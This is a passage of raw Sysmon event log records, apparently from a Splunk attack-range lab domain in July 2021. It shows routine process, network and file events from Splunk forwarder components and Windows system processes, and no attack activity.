Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=755D57FCC081D35F10F6FF60CEDAC583,SHA256=63C305B4D5C88FBA5229DAE8C70AFE55AAEB59CA4A6D67308537FE86F64256FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.393{466BC892-F2F4-60EB-F37C-00000000CF01}53369992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001046130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:43.764{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50917-false10.0.1.12-8000- 10341000x80000000000000001046129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.224{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F4-60EB-F37C-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.208{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.208{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.208{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.208{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.208{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F2F4-60EB-F37C-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.208{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F4-60EB-F37C-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.209{466BC892-F2F4-60EB-F37C-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806208Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:53.847{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B2AF9720C678510035BCCA1EBBBE2BC,SHA256=73ACCC683DD3EB0E1DBA637273C4378B14905269524F942BD4471A3DD6138C9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.939{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C263258AD4C1CE24480C9BC4BE240B46,SHA256=26F541555C833BE291874AB7A07D1BDB58D06FAF0F982A80BFC5E3777ACF2118,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.892{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=350659B954C4449CB5A3D0DB0CE561D2,SHA256=0298F3A77CF4D297F6AD7FBAC2977097DFA1E0C3D57223E95FBDCB9945387FF3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.776{466BC892-F2F5-60EB-F57C-00000000CF01}94889796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F5-60EB-F57C-00000000CF01}9488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2F5-60EB-F57C-00000000CF01}9488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F5-60EB-F57C-00000000CF01}9488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.555{466BC892-F2F5-60EB-F57C-00000000CF01}9488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.959{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D980FD163D8209F612DC47A10F0DBE70,SHA256=3EC5881CE21065DBC0BFA6805292FF4F518723B0DA5D29EAF0658147A09FDE74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806209Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:54.862{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54CF9F9634744130189BA1C490799B15,SHA256=7137F2951BF2275B8579217324CDC3F6E1EE58991DEEF8E53A52ACC7099EF124,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.157{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F6-60EB-F67C-00000000CF01}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.154{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.154{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.138{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.138{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.138{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F2F6-60EB-F67C-00000000CF01}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.138{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F6-60EB-F67C-00000000CF01}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 